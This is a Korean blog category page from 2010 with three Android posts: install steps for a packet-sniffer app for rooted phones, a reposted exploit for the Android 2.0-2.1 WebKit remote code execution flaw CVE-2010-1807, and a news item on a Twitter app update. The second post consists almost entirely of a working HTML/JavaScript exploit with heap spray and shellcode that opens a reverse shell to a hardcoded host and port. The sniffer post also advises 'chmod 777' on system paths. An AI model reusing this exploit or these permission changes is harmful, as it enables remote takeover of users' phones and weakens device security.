'안드로이드'에 해당되는 글 46건

  1. 2010.11.11 Android Packet Sniffer Android-Arts
  2. 2010.11.08 Android 2.0-2.1 WebKit 원격코드실행 취약점
  3. 2010.11.04 Twitter updates Android client to version 1.0.5, includes iOS UI elements
2010. 11. 11. 19:32

Android Packet Sniffer Android-Arts

Android packet sniffer is an app which allows to capture and display WIFI, and Bluetooth traffic
on the android phone.
 
This APP is for ROOTED PHONES ONLY.
You have to be root on your phone, and have the "su" command installed.
 
App Install process:
  
This app is based on the tcpdump package therefor it have to be installed manually.

1. Download and Install PacketSniffer App from the market or from the following direct link.
2. Copy the precompiled TCPDUMP file to the "\data"  library on your phone:    
            -    first make sure your "/data" library has READ and WRITE privileges. if not use:  "chmod 777 data" 
            -    in order to copy use the following command if you have ADB :"adb push c:\locationOfTheTcpdumpFile \data"
            -    in case you don't have ADB you can copy the tcpdump file to the SD card and do:  "cat /sdcard/tcpdump > /data/tcpdump 
3. Give the tcpdump file Read Write and Exec privileges :    "chmod 777 \data\tcpdump"
 
Thats it you are ready to go.



The main layout of the app allows you to initiate a Wifi or a Bluetooth wireless traffic capture service.
It means that you can close the app and the capture will still continue, until you deactivate it.
Before you start to capture you can pick weather to save the captured data on a local SQL DB on the device
or on to a file on the SD card.

When you had enough data captured, you can use the Statistic Analysis or the Statistic Advanced layouts
to analyse the data you have captured by performing various searches on the packets.


Here are few examples of packets captured by the application:



 
If you have any suggestions or remarks regarding the application
feel free to contact me via mail:   vadimnetworks@gmail.com
or leave a remark on the android market.

If you appreciate our work and want to support future developments, you are welcome to place a donation.

출처 : http://sites.google.com/site/androidarts

Trackback 0 Comment 0
2010. 11. 8. 19:01

Android 2.0-2.1 WebKit 원격코드실행 취약점

Webkit Floating Point Datatype Remote Code Execution Vulnerability
<html> <head> <script> // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1 //patched= android 2.2 //author = mj // hardcoded to return a shell to 10.0.2.2 port 2222 // function sploit(pop) { var span = document.createElement("div"); document.getElementById("pwn").appendChild(span); span.innerHTML = pop; } function heap() { var scode = unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c28\u0057\u3c24\u0057\u3c20\u0057\u3c1c\u0057\u3c18\u0057\u3c14\u0057\u3c10\u0057\u3c0c\u0057\u3c08\u0057\u3c04\u0057\u3bfc\u0057\u3bfc\u0057\u3bf8\u0057\u3bf4\u0057\u3bf0\u0057\u3bec\u0057\u3be8\u0057\u3be4\u0057\u3be0\u0057\u3bdc\u0057\u3bd8\u0057\u3bd4\u0057\u3bd0\u0057\u3bcc\u0057\u3bc8\u0057\u3bc4\u0057\u3bc0\u0057\u3bbc\u0057\u3bb8\u0057\u3bb4\u0057\u3bb0\u0057\u3bac\u0057\u3ba8\u0057\u3ba4\u0057\u3ba0\u0057\u3b9c\u0057\u3b98\u0057\u3b94\u0057\u3b90\u0057\u3b8c\u0057\u3b88\u0057\u3b84\u0057\u3b80\u0057\u3b7c\u0057\u3b78\u0057\u3b74\u0057\u3b70\u0057\u3b6c\u0057\u3b68\u0057\u3b64\u0057\u3b60\u0057\u3b5c\u0057\u3b58\u0057\u3b54\u0057\u3b50\u0057\u3b4c\u0057\u3b48\u0057\u3b44\u0057\u3b40\u0057\u3b3c\u0057\u3b38\u0057\u3b34\u0057\u3b30\u0057\u3b2c\u0057\u3b28\u0057\u3b24\u0057\u3b20\u0057\u3b1c\u0057\u3b18\u0057\u3b14\u0057\u3b10\u0057\u3b0c\u0057\u3b08\u0057\u3b04\u0057\u3afc\u0057\u3afc\u0057\u3af8\u0057\u3af4\u0057\u3af0\u0057\u3aec\u0057\u3ae8\u0057\u3ae4\u0057\u3ae0\u0057\u3adc\u0057\u3ad8\u0057\u3ad4\u0057\u3ad0\u0057\u3acc\u0057\u3ac8\u0057\u3ac4\u0057\u3ac0\u0057\u3abc\u0057\u3ab8\u0057\u3ab4\u0057\u3ab0\u0057\u3aac\u0057\u3aa8\u0057\u3aa4\u0057\u3aa0\u0057\u3a9c\u0057\u3a98\u0057\u3a94\u0057\u3a90\u0057\u3a8c\u0057\u3a88\u0057\u3a84\u0057\u3a80\u0057\u3a7c\u0057\u3a78\u0057\u3a74\u0057\u3a70\u0057\u3a6c\u0057\u3a68\u0057\u3a64\u0057\u3a60\u0057\u3a5c\u0057\u3a58\u0057\u3a54\u0057\u3a50\u0057\u3a4c\u0057\u3a48\u0057\u3a44\u0057\u3a40\u0057\u3a3c\u0057\u3a38\u0057\u3a34\u0057\u3a30\u0057\u3a2c\u0057\u3a28\u0057\u3a24\u0057\u3a20\u0057\u3a1c\u0057\u3a18\u0057\u3a14\u0057\u3a10\u0057\u3a0c\u0057\u3a08\u0057\u3a04\u0057\u39fc\u0057\u39fc\u0057\u39f8\u0057\u39f4\u0057\u39f0\u0057\u39ec\u0057\u39e8\u0057\u39e4\u0057\u39e0\u0057\u39dc\u0057\u39d8\u0057\u39d4\u0057\u39d0\u0057\u39cc\u0057\u39c8\u0057\u39c4\u0057\u39c0\u0057\u39bc\u0057\u39b8\u0057\u39b4\u0057\u39b0\u0057\u39ac\u0057\u39a8\u0057\u39a4\u0057\u39a0\u0057\u399c\u0057\u3998\u0057\u3994\u0057\u3990\u0057\u398c\u0057\u3988\u0057\u3984\u0057\u3980\u0057\u397c\u0057\u3978\u0057\u3974\u0057\u3970\u0057\u396c\u0057\u3968\u0057\u3964\u0057\u3960\u0057\u395c\u0057\u3958\u0057\u3954\u0057\u3950\u0057\u394c\u0057\u3948\u0057\u3944\u0057\u3940\u0057\u393c\u0057\u3938\u0057\u3934\u0057\u3930\u0057\u392c\u0057\u3928\u0057\u3924\u0057\u3920\u0057\u391c\u0057\u3918\u0057\u3914\u0057\u3910\u0057\u390c\u0057\u3908\u0057\u3904\u0057\u38fc\u0057\u38fc\u0057\u38f8\u0057\u38f4\u0057\u38f0\u0057\u38ec\u0057\u38e8\u0057\u38e4\u0057\u38e0\u0057\u38dc\u0057\u38d8\u0057\u38d4\u0057\u38d0\u0057\u38cc\u0057\u38c8\u0057\u38c4\u0057\u38c0\u0057\u38bc\u0057\u38b8\u0057\u38b4\u0057\u38b0\u0057\u38ac\u0057\u38a8\u0057\u38a4\u0057\u38a0\u0057\u389c\u0057\u3898\u0057\u3894\u0057\u3890\u0057\u388c\u0057\u3888\u0057\u3884\u0057\u3880\u0057\u387c\u0057\u3878\u0057\u3874\u0057\u3870\u0057\u386c\u0057\u3868\u0057\u3864\u0057\u3860\u0057\u385c\u0057\u3858\u0057\u3854\u0057\u3850\u0057\u384c\u0057\u3848\u0057\u3844\u0057\u3840\u0057\u383c\u0057\u3838\u0057\u3834\u0057\u3830\u0057\u382c\u0057\u3828\u0057\u3824\u0057\u3820\u0057\u381c\u0057\u3818\u0057\u3814\u0057\u3810\u0057\u380c\u0057\u3808\u0057\u3804\u0057\u37fc\u0057\u37fc\u0057\u37f8\u0057\u37f4\u0057\u37f0\u0057\u37ec\u0057\u37e8\u0057\u37e4\u0057\u37e0\u0057\u37dc\u0057\u37d8\u0057\u37d4\u0057\u37d0\u0057\u37cc\u0057\u37c8\u0057\u37c4\u0057\u37c0\u0057\u37bc\u0057\u37b8\u0057\u37b4\u0057\u37b0\u0057\u37ac\u0057\u37a8\u0057\u37a4\u0057\u37a0\u0057\u379c\u0057\u3798\u0057\u3794\u0057\u3790\u0057\u378c\u0057\u3788\u0057\u3784\u0057\u3780\u0057\u377c\u0057\u3778\u0057\u3774\u0057\u3770\u0057\u376c\u0057\u3768\u0057\u3764\u0057\u3760\u0057\u375c\u0057\u3758\u0057\u3754\u0057\u3750\u0057\u374c\u0057\u3748\u0057\u3744\u0057\u3740\u0057\u373c\u0057\u3738\u0057\u3734\u0057\u3730\u0057\u372c\u0057\u3728\u0057\u3724\u0057\u3720\u0057\u371c\u0057\u3718\u0057\u3714\u0057\u3710\u0057\u370c\u0057\u3708\u0057\u3704\u0057\u36fc\u0057\u36fc\u0057\u36f8\u0057\u36f4\u0057\u36f0\u0057\u36ec\u0057\u36e8\u0057\u36e4\u0057\u36e0\u0057\u36dc\u0057\u36d8\u0057\u36d4\u0057\u36d0\u0057\u36cc\u0057\u36c8\u0057\u36c4\u0057\u36c0\u0057\u36bc\u0057\u36b8\u0057\u36b4\u0057\u36b0\u0057\u36ac\u0057\u36a8\u0057\u36a4\u0057\u36a0\u0057\u369c\u0057\u3698\u0057\u3694\u0057\u3690\u0057\u368c\u0057\u3688\u0057\u3684\u0057\u3680\u0057\u367c\u0057\u3678\u0057\u3674\u0057\u3670\u0057\u366c\u0057\u3668\u0057\u3664\u0057\u3660\u0057\u365c\u0057\u3658\u0057\u3654\u0057\u3650\u0057\u364c\u0057\u3648\u0057\u3644\u0057\u3640\u0057\u363c\u0057\u3638\u0057\u3634\u0057\u3630\u0057\u362c\u0057\u3628\u0057\u3624\u0057\u3620\u0057\u361c\u0057\u3618\u0057\u3614\u0057\u3610\u0057\u360c\u0057\u3608\u0057\u3604\u0057\u35fc\u0057\u35fc\u0057\u35f8\u0057\u35f4\u0057\u35f0\u0057\u35ec\u0057\u35e8\u0057\u35e4\u0057\u35e0\u0057\u35dc\u0057\u35d8\u0057\u35d4\u0057\u35d0\u0057\u35cc\u0057\u35c8\u0057\u35c4\u0057\u35c0\u0057\u35bc\u0057\u35b8\u0057\u35b4\u0057\u35b0\u0057\u35ac\u0057\u35a8\u0057\u35a4\u0057\u35a0\u0057\u359c\u0057\u3598\u0057\u3594\u0057\u3590\u0057\u358c\u0057\u3588\u0057\u3584\u0057\u3580\u0057\u357c\u0057\u3578\u0057\u3574\u0057\u3570\u0057\u356c\u0057\u3568\u0057\u3564\u0057\u3560\u0057\u355c\u0057\u3558\u0057\u3554\u0057\u3550\u0057\u354c\u0057\u3548\u0057\u3544\u0057\u3540\u0057\u353c\u0057\u3538\u0057\u3534\u0057\u3530\u0057\u352c\u0057\u3528\u0057\u3524\u0057\u3520\u0057\u351c\u0057\u3518\u0057\u3514\u0057\u3510\u0057\u350c\u0057\u3508\u0057\u3504\u0057\u34fc\u0057\u34fc\u0057\u34f8\u0057\u34f4\u0057\u34f0\u0057\u34ec\u0057\u34e8\u0057\u34e4\u0057\u34e0\u0057\u34dc\u0057\u34d8\u0057\u34d4\u0057\u34d0\u0057\u34cc\u0057\u34c8\u0057\u34c4\u0057\u34c0\u0057\u34bc\u0057\u34b8\u0057\u34b4\u0057\u34b0\u0057\u34ac\u0057\u34a8\u0057\u34a4\u0057\u34a0\u0057\u349c\u0057\u3498\u0057\u3494\u0057\u3490\u0057\u348c\u0057\u3488\u0057\u3484\u0057\u3480\u0057\u347c\u0057\u3478\u0057\u3474\u0057\u3470\u0057\u346c\u0057\u3468\u0057\u3464\u0057\u3460\u0057\u345c\u0057\u3458\u0057\u3454\u0057\u3450\u0057\u344c\u0057\u3448\u0057\u3444\u0057\u3440\u0057\u343c\u0057\u3438\u0057\u3434\u0057\u3430\u0057\u342c\u0057\u3428\u0057\u3424\u0057\u3420\u0057\u341c\u0057\u3418\u0057\u3414\u0057\u3410\u0057\u340c\u0057\u3408\u0057\u3404\u0057\u33fc\u0057\u33fc\u0057\u33f8\u0057\u33f4\u0057\u33f0\u0057\u33ec\u0057\u33e8\u0057\u33e4\u0057\u33e0\u0057\u33dc\u0057\u33d8\u0057\u33d4\u0057\u33d0\u0057\u33cc\u0057\u33c8\u0057\u33c4\u0057\u33c0\u0057\u33bc\u0057\u33b8\u0057\u33b4\u0057\u33b0\u0057\u33ac\u0057\u33a8\u0057\u33a4\u0057\u33a0\u0057\u339c\u0057\u3398\u0057\u3394\u0057\u3390\u0057\u338c\u0057\u3388\u0057\u3384\u0057\u3380\u0057\u337c\u0057\u3378\u0057\u3374\u0057\u3370\u0057\u336c\u0057\u3368\u0057\u3364\u0057\u3360\u0057\u335c\u0057\u3358\u0057\u3354\u0057\u3350\u0057\u334c\u0057\u3348\u0057\u3344\u0057\u3340\u0057\u333c\u0057\u3338\u0057\u3334\u0057\u3330\u0057\u332c\u0057\u3328\u0057\u3324\u0057\u3320\u0057\u331c\u0057\u3318\u0057\u3314\u0057\u3310\u0057\u330c\u0057\u3308\u0057\u3304\u0057\u32fc\u0057\u32fc\u0057\u32f8\u0057\u32f4\u0057\u32f0\u0057\u32ec\u0057\u32e8\u0057\u32e4\u0057\u32e0\u0057\u32dc\u0057\u32d8\u0057\u32d4\u0057\u32d0\u0057\u32cc\u0057\u32c8\u0057\u32c4\u0057\u32c0\u0057\u32bc\u0057\u32b8\u0057\u32b4\u0057\u32b0\u0057\u32ac\u0057\u32a8\u0057\u32a4\u0057\u32a0\u0057\u329c\u0057\u3298\u0057\u3294\u0057\u3290\u0057\u328c\u0057\u3288\u0057\u3284\u0057\u3280\u0057\u327c\u0057\u3278\u0057\u3274\u0057\u3270\u0057\u326c\u0057\u3268\u0057\u3264\u0057\u3260\u0057\u325c\u0057\u3258\u0057\u3254\u0057\u3250\u0057\u324c\u0057\u3248\u0057\u3244\u0057\u3240\u0057\u323c\u0057\u3238\u0057\u3234\u0057\u3230\u0057\u322c\u0057\u3228\u0057\u3224\u0057\u3220\u0057\u321c\u0057\u3218\u0057\u3214\u0057\u3210\u0057\u320c\u0057\u3208\u0057\u3204\u0057\u31fc\u0057\u31fc\u0057\u31f8\u0057\u31f4\u0057\u31f0\u0057\u31ec\u0057\u31e8\u0057\u31e4\u0057\u31e0\u0057\u31dc\u0057\u31d8\u0057\u31d4\u0057\u31d0\u0057\u31cc\u0057\u31c8\u0057\u31c4\u0057\u31c0\u0057\u31bc\u0057\u31b8\u0057\u31b4\u0057\u31b0\u0057\u31ac\u0057\u31a8\u0057\u31a4\u0057\u31a0\u0057\u319c\u0057\u3198\u0057\u3194\u0057\u3190\u0057\u318c\u0057\u3188\u0057\u3184\u0057\u3180\u0057\u317c\u0057\u3178\u0057\u3174\u0057\u3170\u0057\u316c\u0057\u3168\u0057\u3164\u0057\u3160\u0057\u315c\u0057\u3158\u0057\u3154\u0057\u3150\u0057\u314c\u0057\u3148\u0057\u3144\u0057\u3140\u0057\u313c\u0057\u3138\u0057\u3134\u0057\u3130\u0057\u312c\u0057\u3128\u0057\u3124\u0057\u3120\u0057\u311c\u0057\u3118\u0057\u3114\u0057\u3110\u0057\u310c\u0057\u3108\u0057\u3104\u0057\u30fc\u0057\u30fc\u0057\u30f8\u0057\u30f4\u0057\u30f0\u0057\u30ec\u0057\u30e8\u0057\u30e4\u0057\u30e0\u0057\u30dc\u0057\u30d8\u0057\u30d4\u0057\u30d0\u0057\u30cc\u0057\u30c8\u0057\u30c4\u0057\u30c0\u0057\u30bc\u0057\u30b8\u0057\u30b4\u0057\u30b0\u0057\u30ac\u0057\u30a8\u0057\u30a4\u0057\u30a0\u0057\u309c\u0057\u3098\u0057\u3094\u0057\u3090\u0057\u308c\u0057\u3088\u0057\u3084\u0057\u3080\u0057\u307c\u0057\u3078\u0057\u3074\u0057\u3070\u0057\u306c\u0057\u3068\u0057\u3064\u0057\u3060\u0057\u305c\u0057\u3058\u0057\u3054\u0057\u3050\u0057\u304c\u0057\u3048\u0057\u3044\u0057\u3040\u0057\u303c\u0057\u3038\u0057\u3034\u0057\u3030\u0057\u302c\u0057\u3028\u0057\u3024\u0057\u3020\u0057\u301c\u0057\u3018\u0057\u3014\u0057\u3010\u0057\u300c\u0057\u3008\u0057\u3004\u0057\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002\uae08\u000a\u0202\u2000\u2000") do { scode += scode; } while(scode.length < 0x1000); target = new Array(); for(i = 0; i < 1000; i++) target[i] = scode; for (i = 0; i <= 1000; i++) { if (i>999) { sploit(-parseFloat("NAN(ffffe00572c60)")); } document.write("The targets!! " + target[i]); document.write("<br />"); } } </script> </head> <body id="pwn"> woot <script> heap(); </script> </body> </html>
출처 : http://www.securityfocus.com/

Trackback 0 Comment 0
2010. 11. 4. 15:12

Twitter updates Android client to version 1.0.5, includes iOS UI elements



Social networking site Twitter has just rolled out a new version of their Android mobile client. The new version offers several UI enhancements, including several of the gestures and features present in the company’s iOS offering:

Pull to Refresh: This popular feature, which was first available through our iPhone app, functions just as it sounds – when you’re at the top of your timeline, simply pull down to load new Tweets.
Swipe to Reveal: Swipe across a Tweet to get quick access to several options, such as viewing a user’s profile, sharing a tweet, or replying.
Quote a Tweet: Clicking the retweet icon now gives you the option to quote a Tweet. Of course, you can still retweet as you normally would.
• Hi-res avatar photos

Twitter version 1.0.5 is available, as we type, in the Android Market. Head on over in that direction… and grab the updated Facebook application while you’re at it!


Trackback 2 Comment 0